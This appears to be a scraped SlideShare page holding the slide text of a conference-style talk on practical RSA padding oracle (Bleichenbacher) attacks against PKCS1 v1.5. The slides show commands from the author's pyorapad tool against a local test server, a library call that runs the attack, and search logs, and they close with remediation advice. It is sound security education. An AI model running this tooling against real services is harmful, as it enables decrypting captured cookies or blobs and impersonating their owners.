09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?Alexandre Moneger
 
08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen oneAlexandre Moneger
 
ROP ‘n’ ROLL, a peak into modern exploits
ROP ‘n’ ROLL, a peak into modern exploitsROP ‘n’ ROLL, a peak into modern exploits
ROP ‘n’ ROLL, a peak into modern exploitsAlexandre Moneger
 

Plus de Alexandre Moneger (10)

Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbersDefcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers
 
03 - Refresher on buffer overflow in the old days
03 - Refresher on buffer overflow in the old days03 - Refresher on buffer overflow in the old days
03 - Refresher on buffer overflow in the old days
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters
 
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack
 
06 - ELF format, knowing your friend
06 - ELF format, knowing your friend06 - ELF format, knowing your friend
06 - ELF format, knowing your friend
 
05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)
 
09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?
 
08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one
 
ROP ‘n’ ROLL, a peak into modern exploits
ROP ‘n’ ROLL, a peak into modern exploitsROP ‘n’ ROLL, a peak into modern exploits
ROP ‘n’ ROLL, a peak into modern exploits
 

Dernier

Introduction to Machine Learning Unit-3 for II MECH
Introduction to Machine Learning Unit-3 for II MECHIntroduction to Machine Learning Unit-3 for II MECH
Introduction to Machine Learning Unit-3 for II MECHC Sai Kiran
 
Steel Structures - Building technology.pptx
Steel Structures - Building technology.pptxSteel Structures - Building technology.pptx
Steel Structures - Building technology.pptxNikhil Raut
 
Class 1 | NFPA 72 | Overview Fire Alarm System
Class 1 | NFPA 72 | Overview Fire Alarm SystemClass 1 | NFPA 72 | Overview Fire Alarm System
Class 1 | NFPA 72 | Overview Fire Alarm Systemirfanmechengr
 
Unit7-DC_Motors nkkjnsdkfnfcdfknfdgfggfg
Unit7-DC_Motors nkkjnsdkfnfcdfknfdgfggfgUnit7-DC_Motors nkkjnsdkfnfcdfknfdgfggfg
Unit7-DC_Motors nkkjnsdkfnfcdfknfdgfggfgsaravananr517913
 
Introduction-To-Agricultural-Surveillance-Rover.pptx
Introduction-To-Agricultural-Surveillance-Rover.pptxIntroduction-To-Agricultural-Surveillance-Rover.pptx
Introduction-To-Agricultural-Surveillance-Rover.pptxk795866
 
Internet of things -Arshdeep Bahga .pptx
Internet of things -Arshdeep Bahga .pptxInternet of things -Arshdeep Bahga .pptx
Internet of things -Arshdeep Bahga .pptxVelmuruganTECE
 
home automation using Arduino by Aditya Prasad
home automation using Arduino by Aditya Prasadhome automation using Arduino by Aditya Prasad
home automation using Arduino by Aditya Prasadaditya806802
 
Vishratwadi & Ghorpadi Bridge Tender documents
Vishratwadi & Ghorpadi Bridge Tender documentsVishratwadi & Ghorpadi Bridge Tender documents
Vishratwadi & Ghorpadi Bridge Tender documentsSachinPawar510423
 
An experimental study in using natural admixture as an alternative for chemic...
An experimental study in using natural admixture as an alternative for chemic...An experimental study in using natural admixture as an alternative for chemic...
An experimental study in using natural admixture as an alternative for chemic...Chandu841456
 
Industrial Safety Unit-IV workplace health and safety.ppt
Industrial Safety Unit-IV workplace health and safety.pptIndustrial Safety Unit-IV workplace health and safety.ppt
Industrial Safety Unit-IV workplace health and safety.pptNarmatha D
 
NO1 Certified Black Magic Specialist Expert Amil baba in Uae Dubai Abu Dhabi ...
NO1 Certified Black Magic Specialist Expert Amil baba in Uae Dubai Abu Dhabi ...NO1 Certified Black Magic Specialist Expert Amil baba in Uae Dubai Abu Dhabi ...
NO1 Certified Black Magic Specialist Expert Amil baba in Uae Dubai Abu Dhabi ...Amil Baba Dawood bangali
 
Mine Environment II Lab_MI10448MI__________.pptx
Mine Environment II Lab_MI10448MI__________.pptxMine Environment II Lab_MI10448MI__________.pptx
Mine Environment II Lab_MI10448MI__________.pptxRomil Mishra
 
Past, Present and Future of Generative AI
Past, Present and Future of Generative AIPast, Present and Future of Generative AI
Past, Present and Future of Generative AIabhishek36461
 
Input Output Management in Operating System
Input Output Management in Operating SystemInput Output Management in Operating System
Input Output Management in Operating SystemRashmi Bhat
 
Arduino_CSE ece ppt for working and principal of arduino.ppt
Arduino_CSE ece ppt for working and principal of arduino.pptArduino_CSE ece ppt for working and principal of arduino.ppt
Arduino_CSE ece ppt for working and principal of arduino.pptSAURABHKUMAR892774
 
Risk Assessment For Installation of Drainage Pipes.pdf
Risk Assessment For Installation of Drainage Pipes.pdfRisk Assessment For Installation of Drainage Pipes.pdf
Risk Assessment For Installation of Drainage Pipes.pdfROCENODodongVILLACER
 
Work Experience-Dalton Park.pptxfvvvvvvv
Work Experience-Dalton Park.pptxfvvvvvvvWork Experience-Dalton Park.pptxfvvvvvvv
Work Experience-Dalton Park.pptxfvvvvvvvLewisJB
 
US Department of Education FAFSA Week of Action
US Department of Education FAFSA Week of ActionUS Department of Education FAFSA Week of Action
US Department of Education FAFSA Week of ActionMebane Rash
 
Software and Systems Engineering Standards: Verification and Validation of Sy...
Software and Systems Engineering Standards: Verification and Validation of Sy...Software and Systems Engineering Standards: Verification and Validation of Sy...
Software and Systems Engineering Standards: Verification and Validation of Sy...VICTOR MAESTRE RAMIREZ
 
THE SENDAI FRAMEWORK FOR DISASTER RISK REDUCTION
THE SENDAI FRAMEWORK FOR DISASTER RISK REDUCTIONTHE SENDAI FRAMEWORK FOR DISASTER RISK REDUCTION
THE SENDAI FRAMEWORK FOR DISASTER RISK REDUCTIONjhunlian
 

Dernier (20)

Introduction to Machine Learning Unit-3 for II MECH
Introduction to Machine Learning Unit-3 for II MECHIntroduction to Machine Learning Unit-3 for II MECH
Introduction to Machine Learning Unit-3 for II MECH
 
Steel Structures - Building technology.pptx
Steel Structures - Building technology.pptxSteel Structures - Building technology.pptx
Steel Structures - Building technology.pptx
 
Class 1 | NFPA 72 | Overview Fire Alarm System
Class 1 | NFPA 72 | Overview Fire Alarm SystemClass 1 | NFPA 72 | Overview Fire Alarm System
Class 1 | NFPA 72 | Overview Fire Alarm System
 
Unit7-DC_Motors nkkjnsdkfnfcdfknfdgfggfg
Unit7-DC_Motors nkkjnsdkfnfcdfknfdgfggfgUnit7-DC_Motors nkkjnsdkfnfcdfknfdgfggfg
Unit7-DC_Motors nkkjnsdkfnfcdfknfdgfggfg
 
Introduction-To-Agricultural-Surveillance-Rover.pptx
Introduction-To-Agricultural-Surveillance-Rover.pptxIntroduction-To-Agricultural-Surveillance-Rover.pptx
Introduction-To-Agricultural-Surveillance-Rover.pptx
 
Internet of things -Arshdeep Bahga .pptx
Internet of things -Arshdeep Bahga .pptxInternet of things -Arshdeep Bahga .pptx
Internet of things -Arshdeep Bahga .pptx
 
home automation using Arduino by Aditya Prasad
home automation using Arduino by Aditya Prasadhome automation using Arduino by Aditya Prasad
home automation using Arduino by Aditya Prasad
 
Vishratwadi & Ghorpadi Bridge Tender documents
Vishratwadi & Ghorpadi Bridge Tender documentsVishratwadi & Ghorpadi Bridge Tender documents
Vishratwadi & Ghorpadi Bridge Tender documents
 
An experimental study in using natural admixture as an alternative for chemic...
An experimental study in using natural admixture as an alternative for chemic...An experimental study in using natural admixture as an alternative for chemic...
An experimental study in using natural admixture as an alternative for chemic...
 
Industrial Safety Unit-IV workplace health and safety.ppt
Industrial Safety Unit-IV workplace health and safety.pptIndustrial Safety Unit-IV workplace health and safety.ppt
Industrial Safety Unit-IV workplace health and safety.ppt
 
NO1 Certified Black Magic Specialist Expert Amil baba in Uae Dubai Abu Dhabi ...
NO1 Certified Black Magic Specialist Expert Amil baba in Uae Dubai Abu Dhabi ...NO1 Certified Black Magic Specialist Expert Amil baba in Uae Dubai Abu Dhabi ...
NO1 Certified Black Magic Specialist Expert Amil baba in Uae Dubai Abu Dhabi ...
 
Mine Environment II Lab_MI10448MI__________.pptx
Mine Environment II Lab_MI10448MI__________.pptxMine Environment II Lab_MI10448MI__________.pptx
Mine Environment II Lab_MI10448MI__________.pptx
 
Past, Present and Future of Generative AI
Past, Present and Future of Generative AIPast, Present and Future of Generative AI
Past, Present and Future of Generative AI
 
Input Output Management in Operating System
Input Output Management in Operating SystemInput Output Management in Operating System
Input Output Management in Operating System
 
Arduino_CSE ece ppt for working and principal of arduino.ppt
Arduino_CSE ece ppt for working and principal of arduino.pptArduino_CSE ece ppt for working and principal of arduino.ppt
Arduino_CSE ece ppt for working and principal of arduino.ppt
 
Risk Assessment For Installation of Drainage Pipes.pdf
Risk Assessment For Installation of Drainage Pipes.pdfRisk Assessment For Installation of Drainage Pipes.pdf
Risk Assessment For Installation of Drainage Pipes.pdf
 
Work Experience-Dalton Park.pptxfvvvvvvv
Work Experience-Dalton Park.pptxfvvvvvvvWork Experience-Dalton Park.pptxfvvvvvvv
Work Experience-Dalton Park.pptxfvvvvvvv
 
US Department of Education FAFSA Week of Action
US Department of Education FAFSA Week of ActionUS Department of Education FAFSA Week of Action
US Department of Education FAFSA Week of Action
 
Software and Systems Engineering Standards: Verification and Validation of Sy...
Software and Systems Engineering Standards: Verification and Validation of Sy...Software and Systems Engineering Standards: Verification and Validation of Sy...
Software and Systems Engineering Standards: Verification and Validation of Sy...
 
THE SENDAI FRAMEWORK FOR DISASTER RISK REDUCTION
THE SENDAI FRAMEWORK FOR DISASTER RISK REDUCTIONTHE SENDAI FRAMEWORK FOR DISASTER RISK REDUCTION
THE SENDAI FRAMEWORK FOR DISASTER RISK REDUCTION
 

Practical rsa padding oracle attacks

  • 1. Practical RSA padding oracle Attacks Alex Moneger Security Engineer – Cisco Systems 03/12/2014
  • 2. Agenda 1. Textbook RSA problems 2. PKCS1_v1.5 format 3. Padding oracles, what’s that? 4. Bleichenbacher attack 5. Tooling
  • 3. Textbook RSA? • Ciphertext = cleartext e % n • Cleartext is a number which cannot be larger than the keysize • RSA with no padding is referred to as Textbook RSA • It has problems: – It’s predictable, same encrypted result for same cleartext input – It’s malleable, due to homomorphism
  • 4. Textbook RSA problems • Predictability: ➜ pyorapad git:(master) ✗ ./rsa_test_client.py keypairs/256.pub "05" 42f7816006de56bc4899a96645dff79227b6ebe40e6c82363c35b07fe4e8d63b ➜ pyorapad git:(master) ✗ ./rsa_test_client.py keypairs/256.pub "05" 42f7816006de56bc4899a96645dff79227b6ebe40e6c82363c35b07fe4e8d63b • Malleability ➜ pyorapad git:(master) ✗ ./rsa_test_client.py keypairs/256.pub "02" 4129a5c8ade1f1a001fef7a6eedbde3d751c9897cbe9762ebb6c968d4046bd08 ➜ pyorapad git:(master) ✗ ./rsa_test_client.py keypairs/256.pub "03" 7025b707f05ad5d7148f01eaf17fda3aac178f4aa48ace00bc8ef6ecf4ce40eb >>> hex((two * three) % n) '0x2d06ea3806280fddaa35137e3d2bad0152d512a23368c65470dbb5072685a50eL' ➜ pyorapad git:(master) ✗ ./pkcs1_test_oracle.py keypairs/256.priv 2d06ea3806280fddaa35137e3d2bad0152d512a23368c65470dbb5072685a50e 2> /dev/null 0000000000000000000000000000000000000000000000000000000000000006
  • 5. Solutions • Add random padding • Several proposals: – PKCS1 v1.5 – PKCS1 v2.0 referred to as OAEP • Add random bytes in front of the cleartext before encryption • Addresses the problems of predictability and malleability
  • 6. Problems fixed (PKCS1 v1.5 example) • Predictability ➜ pyorapad git:(master) ✗ ./pkcs1_test_client.py -f keypairs/256.pub -x "03" 061b8a582937938990c284fda22c8016af6b729ff4ef1dc938917321fdfef893 ➜ pyorapad git:(master) ✗ ./pkcs1_test_client.py -f keypairs/256.pub -x "03" 297a509da9dc28d6f052febb3c6ae265e6e2905f851e380a5c9a03de519c5c7b • Malleability ➜ pyorapad git:(master) ✗ ./pkcs1_test_client.py -f keypairs/256.pub -x "02" 76054771607245a9ad162b4aacb1573c444da8d4c1c7e5afaa3679b383d8fd6b ➜ pyorapad git:(master) ✗ ./pkcs1_test_client.py -f keypairs/256.pub -x "03” ae367c29f4fb340d02c7fae4bd43e699e50afae443f41c1383d49d927d5ff5fd >>> hex((two * three) % n) '0x79f58ce744adb456c35e1391e7dba658a9acece7d400958cebeb385450d925ecL' ➜ pyorapad git:(master) ✗ ./pkcs1_test_client.py -f keypairs/256.pub -x "06" c89593ba78d465d94eb8fab8fccfcfe94ade1369a849671ccc256dc52b009e62
  • 7. PKCS1 v1.5 • Specifies a padding format • Which looks like this: 1. A header: “x00x02” 2. Some random bytes (minimum 8) 3. A delimiter “x00” 4. Data ➜ pyorapad git:(master) ✗ ./pkcs1_test_client.py -f keypairs/256.pub -c -x • Pretty simple in reality (e.g: for 0x123456789a) "123456789a" 0002c14dcfc27870fa657d0a3446e6571c7f626342e59c1777c600123456789a
  • 8. Summary • Textbook RSA has problems • Padding solves most of them Are we done?
  • 9. Oh no, wait… • What’s a padding oracle • A padding oracle is something which can tell you whether: – Padding is correct – Or not • E.g: – You failed authentication => HTTP 403 – The padding of your authentication request is invalid => HTTP 500
  • 10. What can you do with this? • Padding oracles generally allow you to decrypt a given ciphertext • By querying the oracle repeatedly • Use cases: – Decrypt that cookie I captured for me please – Decrypt that X that I captured through Y • Allows “out of band” decryption of some data blob • Does not allow to retrieve the private
  • 11. Bleichenbacher attack • Is a padding oracle attack on PKCS1 v1.5 • Original paper from 1998 available here • Given an oracle which: – Uses PKCS1 v1.5 padding – Can tell you if RSA decryption failed due to incorrect padding • You can: – retrieve the associated cleartext – by issuing a high number of request (~1 million) – Private key is NOT retrieved
  • 12. How does it work • Remember that RSA is homomorphic • That PKCS1 v1.5 starts with a fixed header “x00x02”: – Cleartext is in a given range (0x000200..00 to 0x0002ff..ff) • I’ll spare the math, but the general idea is: 1. Acquire your target ciphertext (c) 2. Pick a carefully chosen number (s) 3. Encrypt it using the same key as your ciphertext (cs) 4. Multiply cs by c 5. Query oracle. Is the padding valid? 6. If no, increase s and try again
  • 13. How does it work (2) • Once in the PKCS1 v1.5 interval • Choose s even more carefully (choice of s is the beauty of it) • S influences the search interval, so you slowly converge on cleartext m • Finally get m • Easy, any tools please?
  • 14. Tooling • No available general use tools • Now there is one: pyorapad • Allows: 1. Generation of faulty padding 2. Sending the payload 3. Recording responses 4. Recording response times • Response times can be used as a side channel to carry out the padding oracle attack
  • 15. Faulty padding • Given a public key • Generate messages with faulty padding ➜ pyorapad git:(master) ✗ ./pkcs1_test_client.py -f keypairs/256.pub -c -x "3de553c5e7" -4 -5 00020ddae5009fcab758b81559a28101274ccf522acd1ddb8b08003de553c5e7 0002220faab241ef7643a519d39db2c4b6aea6d4b4398c84eaefff3de553c5e7 ➜ pyorapad git:(master) ✗ ./pkcs1_test_client.py -f keypairs/256.pub -x "3de553c5e7" -4 -5 49a0ee1fea1ce4795227709bad74cc948745e8643528d152220e6106bd612499 a9e451901e73deda46d73ce49e98aa381100ac2fd7f697c726ea4c3ce445502f
  • 16. Sending it • Pipe faulty padding and send it • Record answers and timings: ➜ pyorapad git:(master) ✗ ./pkcs1_test_client.py -f keypairs/256.pub "3de553c5e7" -a | http_proxy="http://127.0.0.1:8080" ./http_client.py -u 'http://127.0.0.1:8000' -p Cookie="%s" -i 1 Code: 403 Duration: 0.035813 Code: 403 Duration: 0.049567 Code: 403 Duration: 0.048423 Code: 403 Duration: 0.048562 Code: 500 Duration: 0.088740 • The last case is problematic! Attack time
  • 17. Attacking • Offers a high level library to exploit Bleichenbacher type attacks o = HttpOracle("http://127.0.0.1", headers={"Cookie":"%0128x”}) b = Bleichenbacher.pubkey_from_file("pubkey.pem", o, callback) s1, i = b.run_search("49affbbe68d923e9cd1d2420fec72aea432b5a119df51f1bba89aa1245eeb627d 6809eeebb02db75746df85435735e6e6d11067d77c66da23b7722051141bb19") • S1 will hold the cleartext • A search can take several hours or days • Just need to define a callback to parse the oracle output
  • 18. Phase 1 in practice • Phase 1, searching s (longest phase): DEBUG:padding:Sending task 1 to processing pool: DEBUG:padding: Iteration 1 in task 1 DEBUG:padding: S value: 14127 DEBUG:padding:Sending task 1 to processing pool: DEBUG:padding: Iteration 2 in task 1 DEBUG:padding: S value: 14128 … DEBUG:padding:Result for task: DEBUG:padding: Found in iteration 28172 of task: 1 DEBUG:padding: S value: 42298 INFO:padding:Found PKCS1 conforming message in 28172 iterations for s value: 42298 • We’re now “hooked” into the PKCS1 v1.5 interval
  • 19. Phase 2 in practice • Reducing interval to converge on solution … DEBUG:padding:Calculated interval value: DEBUG:padding: Interval size: 40823541321782616790910632524571305518187877504783604447718694644058771663210372967273792647688025842927 17546734416777529449792040180675967627003571248801 … DEBUG:padding:Calculated interval value: DEBUG:padding: Interval size: 4 DEBUG:padding:Calculated interval value: DEBUG:padding: Interval size: 1 DEBUG:padding:Calculated interval value: DEBUG:padding: Interval size: 0 INFO:padding:Found cleartext solution: • Interval converges slowly towards a single value
  • 20. Results • The last value in the interval is the solution modulo n INFO:padding:Found cleartext solution: INFO:padding: Ciphertext: 18681313587286062135641889229443920979611342782804412111835243686702683071852572419018410834829448119386 86720657288292677215259003956544339524232742829748406492933128999307317683781855531201894097516268131263 9598207414124657744840104859510085525087292502071319630148404307172662102999050705457979498491993909 => 1a9a63081c997974c623e403d7ce6c634716bb387b0f3de975cc3b73db801eb5ed073d80386c8d5e4c8d041eff8b753a184be297 58cceff7600b4ac86447f213703c86f6f705b455b7f93d61591f7a9baf8d0801860a00a68e3a5078fb69abba645670688bb21703 7626dd0ed5c71453d943c9ee48740ed8bc942b9016aadf35 INFO:padding: Cleartext: 72020527656168419129180658335700123142641116633256876460051178807689242604576122345613220129310606314687 45212219072285304055053719717450688437311913116051107249237406698225122488575471036399864282335516394596 442995388467772421125059520611341232370853335240259245614392043581284333901821459787338531300663 => 2a02431a438e0ea2aeb8daa3eb01804ae336465353534825c466acf11cdd9ed248a08b9e35ea1f9c7081ed3c1d29c20770b1a193 7e4aebd9f9e81146b74e18ca7e69698c8adbd33c817d711db5542d9dd3c617fdc1f345ba4586233c3b4658b55b469c4c93e4cdc5 c31793562c6d952bacf6cf25cd0b3a91a4003de553c5e7 INFO:padding:Stopped all worker threads in the pool
  • 21. Practicality • This attack is not theoretical • Worked in the field (now fixed): – Allowed decryption of “customer specific” encrypted blob – Which then allowed to pass traffic as those customers (privilege escalation) • Is applicable to anything which can process many requests: – Smartcards – Cloud services – Network devices • It’s not that hard. Do not underestimate padding oracles
  • 22. Conclusion • Padding oracles affect CBC mode and RSA • Most paddings are vulnerable (including OAEP) • Make sure your padding oracles are fixed • Especially if customer/network facing • Fixing also means giving no timing hints (which is awfully hard) • Authenticate your crypto (encryption is not authentication) • Authenticate your crypto after encryption